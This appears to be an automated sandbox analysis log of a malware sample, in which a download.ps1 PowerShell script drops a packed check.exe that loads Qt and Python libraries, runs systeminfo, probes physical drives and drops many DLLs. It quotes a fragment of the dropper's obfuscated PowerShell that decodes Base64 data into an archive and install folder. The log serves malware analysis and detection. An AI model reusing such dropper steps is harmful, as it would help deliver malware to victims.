Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libffi-8.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5core.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: libssl-3.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: qt5gui.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d9.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: download.ps1Static file information: File size 51316505 > 1048576
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.1791390585.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.1792660148.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2170173659.00007FFBA0E47000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.1764181541.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2202836446.00007FFBBC703000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2184592817.00007FFBA9935000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2172607096.00007FFBA1202000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.1779981685.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2201831662.00007FFBBC155000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2200750849.00007FFBBBE93000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2188337968.00007FFBB1893000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2200254820.00007FFBBB746000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000005.00000002.2191613703.00007FFBB5C1D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2163791427.00007FFBA069A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2203785112.00007FFBC1B34000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2189414783.00007FFBB4C49000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.1779557070.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2185925889.00007FFBAB9BE000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(${random_encoded_data});[System.IO.File]::WriteAllBytes(${random_archive_file},${random_decoded_bytes});${random_new_item}=New-Item -ItemType Directory -Path ${random_install_path};tr
Source: VCRUNTIME140.dll.4.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
Source: MSVCP140.dll.4.drStatic PE information: section name: .didat
Source: Qt5Core.dll.4.drStatic PE information: section name: .qtmimed
Source: VCRUNTIME140.dll.4.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.4.drStatic PE information: section name: _RDATA
Source: VCRUNTIME140.dll0.4.drStatic PE information: section name: _RDATA
Source: opengl32sw.dll.4.drStatic PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.4.drStatic PE information: section name: .qtmetad
Source: qsvgicon.dll.4.drStatic PE information: section name: .qtmetad
Source: qgif.dll.4.drStatic PE information: section name: .qtmetad
Source: qicns.dll.4.drStatic PE information: section name: .qtmetad
Source: qico.dll.4.drStatic PE information: section name: .qtmetad
Source: qjpeg.dll.4.drStatic PE information: section name: .qtmetad
Source: qsvg.dll.4.drStatic PE information: section name: .qtmetad
Source: libcrypto-3.dll.4.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.4.drStatic PE information: section name: .00cfg
Source: python313.dll.4.drStatic PE information: section name: PyRuntim
Source: qtga.dll.4.drStatic PE information: section name: .qtmetad
Source: qtiff.dll.4.drStatic PE information: section name: .qtmetad
Source: qwbmp.dll.4.drStatic PE information: section name: .qtmetad
Source: qwebp.dll.4.drStatic PE information: section name: .qtmetad
Source: qminimal.dll.4.drStatic PE information: section name: .qtmetad
Source: qoffscreen.dll.4.drStatic PE information: section name: .qtmetad
Source: qwebgl.dll.4.drStatic PE information: section name: .qtmetad
Source: qwindows.dll.4.drStatic PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.4.drStatic PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.4.drStatic PE information: section name: .qtmetad
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.6.drStatic PE information: section name: _RDATA
Source: MSVCP140.dll.6.drStatic PE information: section name: .didat
Source: Qt5Core.dll.6.drStatic PE information: section name: .qtmimed
Source: libcrypto-3.dll.6.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.6.drStatic PE information: section name: .00cfg
Source: VCRUNTIME140.dll0.6.drStatic PE information: section name: _RDATA
Source: python313.dll.6.drStatic PE information: section name: PyRuntim
Source: opengl32sw.dll.6.drStatic PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.6.drStatic PE information: section name: .qtmetad
Source: qsvgicon.dll.6.drStatic PE information: section name: .qtmetad
Source: qgif.dll.6.drStatic PE information: section name: .qtmetad
Source: qicns.dll.6.drStatic PE information: section name: .qtmetad
Source: qico.dll.6.drStatic PE information: section name: .qtmetad
Source: qjpeg.dll.6.drStatic PE information: section name: .qtmetad
Source: qsvg.dll.6.drStatic PE information: section name: .qtmetad
Source: qtga.dll.6.drStatic PE information: section name: .qtmetad
Source: qtiff.dll.6.drStatic PE information: section name: .qtmetad
Source: qwbmp.dll.6.drStatic PE information: section name: .qtmetad
Source: qwebp.dll.6.drStatic PE information: section name: .qtmetad
Source: qminimal.dll.6.drStatic PE information: section name: .qtmetad
Source: qoffscreen.dll.6.drStatic PE information: section name: .qtmetad
Source: qwebgl.dll.6.drStatic PE information: section name: .qtmetad
Source: qwindows.dll.6.drStatic PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.6.drStatic PE information: section name: .qtmetad

Persistence and Installation Behavior

barindex
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, \\.\PhysicalDrive%d16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, PhysicalDrive%i16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle, DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI32762\libcrypto-3.dllJump to dropped file
